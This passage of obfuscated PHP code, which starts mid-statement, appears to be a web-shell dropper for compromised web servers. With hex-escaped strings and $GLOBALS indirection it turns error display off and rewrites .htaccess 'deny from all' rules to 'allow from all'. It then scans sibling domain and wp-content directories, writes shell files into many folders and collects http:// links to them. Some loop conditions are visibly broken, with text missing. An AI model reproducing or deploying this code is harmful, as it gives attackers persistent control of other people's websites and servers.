as${${"\x47\x4c\x4fB\x41L\x53"}["dg\x65\x6f\x68z\x71\x77"]}=>${$uiccsexkg})${${"GLO\x42\x41L\x53"}["gv\x62a\x62\x75\x72\x71"]}[${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x61\x6dh\x6d\x6cy\x65\x62\x6e"]}]=substr(${${"G\x4c\x4f\x42\x41\x4cS"}["\x79\x7a\x6b\x71\x65\x6a"]},strlen(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x73\x62\x6dr\x6b\x6a\x66m\x6d\x6ar"]}));}${${"G\x4c\x4f\x42A\x4c\x53"}["\x69\x72\x79\x63r\x6d\x76\x74d"]}=scandir(${${"GLO\x42\x41L\x53"}["\x6d\x78\x6fusj\x66\x72\x63\x66\x64"]});if(!empty(${${"\x47L\x4f\x42A\x4cS"}["\x78\x62v\x6b\x72\x6f\x6a"]})){foreach(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x78b\x76\x6br\x6f\x6a"]} as${${"\x47L\x4f\x42\x41\x4cS"}["\x64g\x65\x6f\x68\x7a\x71\x77"]}=>${${"\x47L\x4f\x42A\x4c\x53"}["gfqs\x7aq"]}){$gppedvyplb="\x76";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x64h\x66\x6af\x6c\x76\x71\x61"]="\x76";${"\x47\x4c\x4f\x42\x41\x4cS"}["l\x66\x74d\x77\x69\x78\x68\x7a\x6b"]="\x76";${"\x47L\x4f\x42\x41L\x53"}["\x69imgs\x78\x67"]="\x6b";if((${${"\x47\x4cO\x42A\x4c\x53"}["lf\x74\x64\x77\x69\x78hzk"]}==".")||(${$gppedvyplb}==".\x2e")||(!is_dir(${${"G\x4c\x4f\x42ALS"}["\x73\x62\x6dr\x6b\x6a\x66m\x6d\x6ar"]}.${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["d\x68f\x6a\x66\x6c\x76qa"]})))unset(${${"\x47\x4cOBA\x4c\x53"}["xbv\x6b\x72\x6f\x6a"]}[${${"\x47\x4cO\x42\x41\x4c\x53"}["i\x69m\x67\x73xg"]}]);}}if(!empty(${${"GL\x4fB\x41L\x53"}["r\x67\x6fm\x76x\x71"]}))${${"G\x4c\x4f\x42A\x4cS"}["\x67v\x62\x61b\x75\x72\x71"]}=array_merge(${${"G\x4c\x4fB\x41\x4c\x53"}["\x67\x76\x62a\x62u\x72q"]},${${"G\x4c\x4fB\x41\x4c\x53"}["\x78bv\x6br\x6fj"]});foreach(${${"GLO\x42A\x4c\x53"}["\x75\x79cwk\x64v\x73i\x63\x6dh"]} as${${"G\x4cO\x42A\x4c\x53"}["\x64g\x65\x6f\x68\x7aq\x77"]}=>${${"\x47L\x4f\x42AL\x53"}["gf\x71szq"]}){$whygedigua="v";$bgtfdtpbcwg="b\x61\x73\x65_\x64\x69r";${"G\x4c\x4f\x42\x41L\x53"}["\x61q\x64\x71f\x66\x7a\x6a\x69"]="\x76";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x73\x71\x72kh\x67\x79\x63\x64\x72"]="\x68a\x73_\x66i\x6c\x74e\x72";${"G\x4cO\x42\x41\x4cS"}["\x6a\x6d\x68o\x63\x62\x67"]="s\x79\x6dbo\x6c";$benduonh="\x64\x69\x72\x731";if(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x73\x71\x72\x6bh\x67y\x63\x64\x72"]}&&(strpos(${${"\x47L\x4f\x42\x41\x4cS"}["a\x71\x64\x71\x66f\x7aj\x69"]},${${"G\x4c\x4f\x42\x41L\x53"}["\x6am\x68\x6f\x63b\x67"]})===false)){$aobyvphjdqo="\x6b";unset(${${"\x47\x4c\x4fBA\x4c\x53"}["\x67\x76\x62\x61\x62\x75\x72q"]}[${$aobyvphjdqo}]);continue;}if(strpos(${${"\x47L\x4fB\x41\x4c\x53"}["g\x66\x71\x73\x7aq"]},"/")===false)${$whygedigua}.="/";${$benduonh}[${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x64\x67\x65\x6fh\x7aq\x77"]}]=${$bgtfdtpbcwg}.${${"G\x4cO\x42\x41LS"}["\x67f\x71\x73z\x71"]};}return array_values(array_unique(${${"G\x4c\x4f\x42\x41L\x53"}["\x62l\x63\x68\x74\x76\x69"]}));}function processHtaccess($base_dir){${"\x47\x4c\x4f\x42\x41LS"}["\x6d\x7a\x63\x78u\x76u\x6f"]="\x64\x65\x6ey";$mwuqprmeooon="d\x65\x6e\x79";${"G\x4cOBAL\x53"}["\x6d\x7a\x63\x68\x76y"]="d\x61\x74\x61";$nynfkgo="\x62\x61se\x5f\x64ir";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x79\x67\x67\x76\x6d\x65\x7a\x63\x63\x63"]="\x64at\x61";${${"G\x4cO\x42\x41\x4cS"}["\x6dz\x63x\x75vu\x6f"]}="den\x79\x20\x66\x72\x6fm\x20al\x6c";${${"\x47L\x4f\x42\x41L\x53"}["\x6dz\x63\x68v\x79"]}=file_get_contents(${$nynfkgo}."\x2e\x68\x74ac\x63e\x73\x73");if((${${"\x47\x4cO\x42A\x4cS"}["\x79\x67\x67\x76me\x7ac\x63\x63"]}!==false)&&(stripos(${${"\x47\x4c\x4fBA\x4c\x53"}["\x64z\x76u\x68\x74\x75"]},${$mwuqprmeooon})!==false)){${"\x47LO\x42A\x4cS"}["zp\x71\x63\x79\x66\x77\x65\x6cx"]="da\x74a";$bpnbmbz="d\x61\x74a";$zunrlwpbow="d\x65n\x79";${${"\x47\x4cO\x42A\x4c\x53"}["\x7a\x70qc\x79\x66\x77\x65\x6c\x78"]}=str_ireplace(${$zunrlwpbow},"a\x6c\x6co\x77\x20f\x72\x6fm\x20\x61ll",${${"\x47\x4c\x4fBA\x4c\x53"}["dz\x76\x75h\x74\x75"]});file_put_contents(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x73\x62\x6dr\x6bj\x66\x6d\x6dj\x72"]}."\x2e\x68\x74\x61c\x63e\x73\x73",${$bpnbmbz});}}$lhjbdgup="\x70at\x68";${"G\x4c\x4f\x42A\x4c\x53"}["\x6bh\x64\x6eb\x79\x65"]="\x70at\x68";function encStr($s){$enkbcmu="i";$rtzoryzhc="\x72e\x73\x75\x6c\x74";${${"\x47L\x4f\x42\x41\x4c\x53"}["os\x76k\x64sul\x6f\x74"]}="";$zkrrywrghjq="\x73";for(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x66\x6fw\x64\x67\x67k\x6b\x68\x70\x67"]}=0;${${"\x47\x4cOBALS"}["\x66o\x77d\x67g\x6b\x6b\x68p\x67"]}0)${${"G\x4cO\x42\x41\x4cS"}["s\x6e\x66\x6d\x74uc"]}.=("\x3b".${${"\x47L\x4f\x42\x41\x4c\x53"}["\x65tf\x79\x66\x6c\x74"]});return${${"\x47\x4cO\x42\x41LS"}["s\x6e\x66\x6dt\x75\x63"]};}else return false;}function saveShell($shell_base_dir){${"GL\x4f\x42A\x4c\x53"}["p\x6d\x68\x64h\x64r\x78usa"]="cu\x72_s\x68\x65\x6c\x6c";${"\x47L\x4fBA\x4cS"}["hg\x63\x70l\x70\x77\x61b\x6d\x78"]="c\x75r_s\x68\x65l\x6c";${"GLO\x42\x41\x4cS"}["yc\x64\x6b\x7a\x6a\x77t\x6a\x62\x75"]="\x63ur\x5f\x73\x68\x65\x6c\x6c";$nbbgnwve="\x73\x68e\x6cl_ba\x73\x65\x5f\x64\x69\x72";$ugurufbd="\x61r\x72\x5fs\x68\x65\x6cl\x73";$vvszsse="\x63\x75\x72_\x73\x68\x65\x6cl";${${"GL\x4fBAL\x53"}["\x63\x67bt\x67kl\x6c"]}=array();${$vvszsse}=saveOneShell(${$nbbgnwve},1);if(${${"G\x4c\x4f\x42A\x4c\x53"}["\x70mh\x64\x68\x64r\x78u\x73\x61"]}!==false)${${"G\x4c\x4fBA\x4cS"}["\x63g\x62t\x67k\x6c\x6c"]}[]=${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x68\x67\x63\x70l\x70\x77abmx"]};${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6b\x77t\x6ey\x63\x6c"]="\x63\x75\x72_s\x68\x65\x6c\x6c";${${"GL\x4fBA\x4cS"}["\x6d\x62\x6f\x77s\x61o\x64"]}=saveOneShell(${${"\x47\x4cO\x42\x41L\x53"}["\x75\x62\x76\x70k\x77\x73"]},2);if(${${"\x47LO\x42\x41\x4c\x53"}["\x6dbo\x77\x73\x61od"]}!==false)${$ugurufbd}[]=${${"GL\x4f\x42A\x4cS"}["\x79\x63dk\x7a\x6a\x77t\x6a\x62u"]};${${"\x47L\x4f\x42\x41L\x53"}["\x6db\x6f\x77\x73\x61\x6f\x64"]}=saveOneShell(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75\x62\x76\x70k\x77\x73"]},3);if(${${"\x47\x4c\x4fB\x41L\x53"}["m\x62\x6f\x77s\x61od"]}!==false)${${"\x47\x4cO\x42\x41\x4c\x53"}["\x63g\x62\x74\x67k\x6c\x6c"]}[]=${${"\x47\x4cOBA\x4c\x53"}["\x6bw\x74\x6e\x79cl"]};if(count(${${"G\x4c\x4f\x42AL\x53"}["\x63\x67\x62\x74\x67\x6b\x6c\x6c"]})>0)return implode("\n",${${"\x47\x4c\x4fB\x41LS"}["\x63g\x62\x74gk\x6c\x6c"]});else return false;}function uploadShell($base_dir,$is_first){${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6a\x72d\x76\x6d\x6b\x6a"]="\x64\x69r\x73";processHtaccess(${${"\x47L\x4fB\x41L\x53"}["\x73\x62mr\x6bj\x66\x6dm\x6a\x72"]});${${"\x47\x4cOB\x41\x4c\x53"}["\x6ardvmk\x6a"]}=getSubdirs(${${"GL\x4f\x42A\x4cS"}["\x73b\x6d\x72kjfm\x6d\x6ar"]},"");if(${${"G\x4c\x4f\x42\x41LS"}["\x75\x6dk\x71\x61\x76\x67"]}){${"\x47L\x4f\x42\x41\x4cS"}["\x77\x67\x76z\x73\x75o"]="u\x70l\x6fad\x65\x64";${${"\x47\x4c\x4fB\x41L\x53"}["\x71\x65\x66\x73\x63\x63\x6f"]}=array();foreach(${${"G\x4cO\x42A\x4cS"}["e\x64\x69\x74\x6dn\x6fj"]} as${${"\x47LOB\x41\x4c\x53"}["\x6e\x6ax\x6c\x6bw\x62\x6fz"]}){$pjqbdvq="d\x69\x72";${"GL\x4fB\x41\x4cS"}["\x7agt\x74\x6e\x69\x77"]="\x73a\x76e\x64";${"\x47LO\x42AL\x53"}["\x6d\x65\x76\x6c\x64\x72s"]="up\x6c\x6fad\x65\x64";${${"\x47\x4cO\x42\x41LS"}["\x7a\x67\x74\x74\x6eiw"]}=uploadShell(${$pjqbdvq},false);if(${${"GL\x4f\x42\x41L\x53"}["p\x6c\x62\x62\x64\x66d\x7a"]}!==false)${${"G\x4c\x4f\x42\x41\x4c\x53"}["m\x65\x76\x6c\x64rs"]}[]=${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x70\x6c\x62b\x64\x66\x64\x7a"]};}if(count(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x71e\x66sc\x63\x6f"]})==0){$mjjciqzuueq="\x73\x61\x76\x65\x64";${${"\x47LO\x42A\x4c\x53"}["\x70\x6c\x62bdf\x64\x7a"]}=saveShell(${${"G\x4c\x4f\x42\x41L\x53"}["\x73\x62\x6dr\x6b\x6a\x66\x6dm\x6a\x72"]});${"G\x4cOB\x41L\x53"}["\x79\x75\x6b\x6b\x75k\x67\x66"]="\x73aved";if(${${"\x47L\x4f\x42ALS"}["y\x75\x6b\x6b\x75\x6bg\x66"]}!==false)${${"G\x4cO\x42A\x4cS"}["q\x65\x66s\x63co"]}[]=${$mjjciqzuueq};}return${${"\x47\x4cO\x42\x41\x4c\x53"}["\x77\x67v\x7a\x73u\x6f"]};}else{$qrxzbtejratd="d\x69\x72\x73";$svtacktcqy="s\x61\x76\x65d";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x68\x65nj\x68\x6e\x67i\x65\x66\x77\x69"]="b\x61s\x65_\x64\x69\x72";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x66\x63\x6f\x6e\x65\x77\x66\x70\x70\x75\x71"]="\x64\x69r";${$svtacktcqy}=false;foreach(${$qrxzbtejratd} as${${"G\x4c\x4fB\x41L\x53"}["f\x63\x6fnewf\x70\x70\x75\x71"]}){${"\x47\x4c\x4f\x42\x41LS"}["\x72w\x69z\x61h\x6a\x73l\x73"]="\x64\x69\x72";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x70\x6c\x62b\x64f\x64\x7a"]}=uploadShell(${${"\x47\x4cOB\x41L\x53"}["r\x77\x69\x7a\x61\x68\x6a\x73\x6cs"]},false);if(${${"G\x4c\x4fB\x41L\x53"}["\x70\x6c\x62\x62\x64\x66\x64\x7a"]}!==false)return${${"\x47L\x4f\x42\x41\x4c\x53"}["\x70l\x62b\x64\x66\x64\x7a"]};}if(${${"\x47L\x4f\x42AL\x53"}["\x70l\x62\x62\x64fdz"]}===false)return saveShell(${${"\x47\x4c\x4f\x42\x41L\x53"}["h\x65nj\x68n\x67i\x65fwi"]});}}@ini_set("\x64isp\x6ca\x79\x5f\x65rr\x6f\x72s","Of\x66");${"GL\x4f\x42\x41\x4cS"}["\x6cx\x69xd\x73\x66w\x67\x74\x65"]="\x72\x65\x73ul\x74";${${"\x47\x4cOB\x41\x4cS"}["o\x77m\x66\x6c\x75d\x70\x6a\x6co"]}=array_values(array_diff(explode("/",dirname(__FILE__)),array("")));if(count(${$lhjbdgup})==1)${${"GL\x4f\x42ALS"}["\x6f\x77\x6d\x66lu\x64pj\x6c\x6f"]}=array_values(array_diff(explode("\",dirname(__FILE__)),array("")));${${"\x47\x4cO\x42\x41L\x53"}["\x6c\x78\x69\x78\x64s\x66wg\x74\x65"]}=array();$immhoqd="r\x65\x73\x75lt";for(${${"\x47\x4cO\x42AL\x53"}["\x66\x6f\x77\x64\x67gkkh\x70g"]}=0;${${"\x47\x4c\x4f\x42A\x4c\x53"}["f\x6f\x77\x64\x67\x67k\x6b\x68\x70\x67"]}0)&&(${${"G\x4c\x4f\x42A\x4c\x53"}["\x70\x67\x76\x62jmmv\x62w"]}!==false)&&(${$iuyiwahe}!==0)){${"G\x4c\x4fB\x41LS"}["\x71\x65s\x75\x78z\x6b\x70"]="d\x6f\x6da\x69\x6e\x73";$rwtpvnoitma="i";${"GLOB\x41\x4c\x53"}["m\x75\x69p\x79y\x6e\x76"]="d\x6f\x6dain\x5f\x64\x69\x72";$ddqfklmdeu="d\x6f\x6da\x69n\x73";${${"\x47\x4cO\x42AL\x53"}["\x76a\x63\x72\x79\x63\x72f\x79"]}="/".implode("/",array_slice(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6fwm\x66l\x75dp\x6a\x6co"]},0,${$rwtpvnoitma}))."/";${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x71\x65\x73\x75x\x7a\x6b\x70"]}=getSubdirs(${${"\x47\x4c\x4fB\x41\x4cS"}["\x76\x61\x63\x72y\x63\x72\x66\x79"]},".");foreach(${$ddqfklmdeu} as${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x75ip\x79\x79\x6e\x76"]}){$ropdqmnnih="v";${${"G\x4c\x4f\x42A\x4c\x53"}["\x68myx\x6c\x77\x62\x6b\x79k\x64\x6f"]}=uploadShell(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6f\x61\x6d\x79u\x65\x70\x63\x61b"]},true);foreach(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x68\x6d\x79\x78\x6c\x77b\x6b\x79k\x64o"]} as${$ropdqmnnih}){${"GL\x4f\x42\x41\x4c\x53"}["\x71nk\x68\x74tnu\x6dk\x65"]="\x76";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x74p\x6fgv\x79\x65b\x72"]="\x75r\x6c";${${"G\x4c\x4fBA\x4c\x53"}["\x6fx\x73tq\x66\x75\x6e\x65\x71y"]}=str_replace(${${"GL\x4fB\x41L\x53"}["\x76ac\x72yc\x72\x66\x79"]},"h\x74tp://",${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x71\x6e\x6b\x68t\x74\x6e\x75\x6d\x6b\x65"]});${"\x47LO\x42\x41\x4cS"}["c\x62\x6au\x78\x61\x65"]="\x75r\x6c";$ocdykkevp="\x72\x65\x73\x75\x6c\x74";$tewaommruug="\x72e\x73\x75l\x74";${$tewaommruug}[]=${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6fx\x73\x74\x71f\x75\x6e\x65qy"]};if(strpos(${${"\x47\x4c\x4f\x42ALS"}["t\x70o\x67v\x79\x65\x62r"]},"/\x68\x74\x6dl/")!==false)${$ocdykkevp}[]=str_replace("/\x68\x74\x6dl/","/",${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6f\x78st\x71\x66\x75\x6e\x65\x71y"]});if(strpos(${${"G\x4c\x4fBAL\x53"}["\x6f\x78\x73\x74\x71\x66\x75n\x65q\x79"]},"/p\x75bl\x69\x63_h\x74\x6d\x6c/")!==false)${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x73\x76k\x64s\x75\x6c\x6ft"]}[]=str_replace("/\x70\x75\x62l\x69\x63_\x68\x74m\x6c/","/",${${"\x47L\x4f\x42\x41\x4cS"}["\x6f\x78\x73\x74\x71\x66\x75ne\x71y"]});if(strpos(${${"\x47LO\x42A\x4cS"}["\x63bjux\x61e"]},"/w\x77w/")!==false){${"\x47LO\x42\x41L\x53"}["z\x73pw\x76\x6e\x76h\x78"]="\x75r\x6c";${"\x47\x4c\x4fB\x41\x4c\x53"}["n\x79\x66\x6a\x77\x77\x71h\x61\x68\x67\x71"]="\x75\x72\x6c";$bvwvrfctqkk="\x72e\x73\x75\x6c\x74";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["o\x78st\x71\x66un\x65qy"]}=str_replace("/w\x77w/","/",${${"G\x4cOBALS"}["\x7a\x73\x70w\x76\x6e\x76\x68\x78"]});${$bvwvrfctqkk}[]=${${"\x47\x4c\x4fBA\x4cS"}["o\x78st\x71f\x75\x6e\x65\x71\x79"]};if(strpos(${${"\x47\x4c\x4fB\x41L\x53"}["\x6f\x78\x73\x74\x71\x66u\x6ee\x71y"]},"/\x68tm\x6c/")!==false)${${"\x47L\x4f\x42A\x4c\x53"}["o\x73vkds\x75\x6c\x6f\x74"]}[]=str_replace("/h\x74\x6d\x6c/","/",${${"\x47\x4c\x4f\x42A\x4cS"}["o\x78\x73\x74q\x66\x75\x6e\x65\x71\x79"]});if(strpos(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6f\x78\x73\x74qfu\x6ee\x71\x79"]},"/p\x75b\x6cic\x5fh\x74\x6d\x6c/")!==false)${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["o\x73\x76\x6b\x64s\x75\x6co\x74"]}[]=str_replace("/\x70ubli\x63\x5fhtml/","/",${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6e\x79\x66j\x77\x77qh\x61\x68\x67\x71"]});}}}}}if(true){${"\x47\x4cO\x42\x41L\x53"}["\x6b\x64\x65c\x69\x77"]="\x6f\x66\x66\x73\x65\x74";$fxjhlmueof="\x72\x65\x73";$xugekxlsr="b\x61\x73e\x5f\x70\x61t\x68";${"GL\x4f\x42\x41\x4cS"}["\x6d\x6bz\x64oe\x79\x70\x67\x65\x6e\x6c"]="\x62\x61\x73e\x5f\x70\x61\x74\x68";${"GL\x4fBA\x4cS"}["\x6f\x75v\x68ft\x6e\x67\x66xf\x6a"]="\x62\x61\x73e\x5f\x70a\x74h";$wksmcudiot="\x64i\x72\x73";${"G\x4c\x4f\x42AL\x53"}["py\x6f\x68o\x6bm\x69\x6c\x7a\x69\x64"]="\x62\x61\x73e\x5fp\x61\x74\x68";${${"\x47\x4c\x4f\x42\x41\x4cS"}["v\x61\x63\x72yc\x72\x66\x79"]}=dirname(__FILE__);if(${$xugekxlsr}[strlen(${${"GL\x4f\x42\x41\x4cS"}["ouvhf\x74ngfxfj"]})-1]!=="/")${${"G\x4cO\x42\x41L\x53"}["\x76\x61\x63r\x79c\x72f\x79"]}.="/";$flivynmw="ba\x73e\x5f\x70\x61\x74h";${"\x47L\x4fB\x41\x4c\x53"}["s\x6b\x75\x79lt\x66\x6f\x74iu"]="\x6f\x66f\x73et";${"GL\x4fB\x41\x4cS"}["lr\x76\x65\x79\x74c\x69"]="di\x72\x73";${${"\x47LO\x42A\x4c\x53"}["hm\x79\x78l\x77b\x6b\x79\x6b\x64\x6f"]}=uploadShell(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["mkz\x64\x6f\x65\x79\x70\x67e\x6e\x6c"]},true);${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6c\x72v\x65\x79\x74\x63\x69"]}=array();${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6b\x6dm\x64\x63\x68\x65w\x75\x78\x63"]}=strrpos(${$flivynmw},"w\x70-\x63o\x6eten\x74");if(${${"GL\x4f\x42ALS"}["\x6b\x64\x65\x63\x69\x77"]}!==false)${$wksmcudiot}[]=getMainURL().substr(${${"\x47L\x4fB\x41\x4c\x53"}["\x70\x79o\x68\x6fkm\x69\x6c\x7a\x69\x64"]},${${"\x47LOB\x41LS"}["\x73\x6b\x75\x79l\x74\x66o\x74\x69\x75"]});else{$ywhipfdo="i";for(${${"\x47\x4c\x4fB\x41\x4cS"}["\x66\x6fw\x64ggk\x6b\x68p\x67"]}=1;${$ywhipfdo}<=4;++${${"G\x4cO\x42\x41\x4c\x53"}["f\x6f\x77d\x67g\x6b\x6b\x68\x70\x67"]}){$fsqqhtyhz="\x70\x61\x74\x68";${"\x47L\x4f\x42\x41\x4c\x53"}["\x6c\x76\x77bys\x73"]="p\x61\x74\x68";if(count(${${"G\x4c\x4fB\x41\x4cS"}["\x6c\x76\x77byss"]})>=${${"G\x4c\x4fBA\x4cS"}["\x66o\x77\x64\x67\x67\x6bkh\x70\x67"]})${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x65d\x69tm\x6eoj"]}[]=getMainURL().implode("/",array_slice(${${"\x47\x4c\x4fBAL\x53"}["\x6fw\x6d\x66\x6c\x75dp\x6alo"]},count(${$fsqqhtyhz})-${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x66\x6fwd\x67g\x6b\x6b\x68\x70\x67"]}))."/";}}foreach(${$fxjhlmueof} as${${"G\x4cO\x42\x41LS"}["d\x6b\x62\x75dm\x72\x73"]}){$wnorqb="\x76";${"G\x4c\x4f\x42A\x4c\x53"}["g\x78y\x68u\x69hk\x68"]="\x762";${${"GL\x4fB\x41L\x53"}["\x6cb\x66\x64q\x74\x68\x6b"]}=explode("\n",${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x64\x6b\x62\x75\x64\x6d\x72s"]});foreach(${${"\x47LOB\x41LS"}["g\x78\x79\x68\x75\x69\x68k\x68"]} as${$wnorqb}){${"G\x4cO\x42\x41\x4cS"}["w\x76\x6f\x69\x73n\x6e\x64\x79"]="\x64";$xqruqltgge="d";$jrvqdbjw="\x64\x69r\x73";foreach(${$jrvqdbjw} as${${"GLO\x42\x41\x4c\x53"}["\x77\x76\x6f\x69\x73n\x6edy"]})${${"\x47L\x4fBA\x4cS"}["\x6f\x73\x76k\x64s\x75lo\x74"]}[]=${$xqruqltgge}.str_replace(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x76\x61\x63\x72\x79crf\x79"]},"",${${"\x47LOBAL\x53"}["g\x66\x71s\x7a\x71"]});}}}echo"";} ?>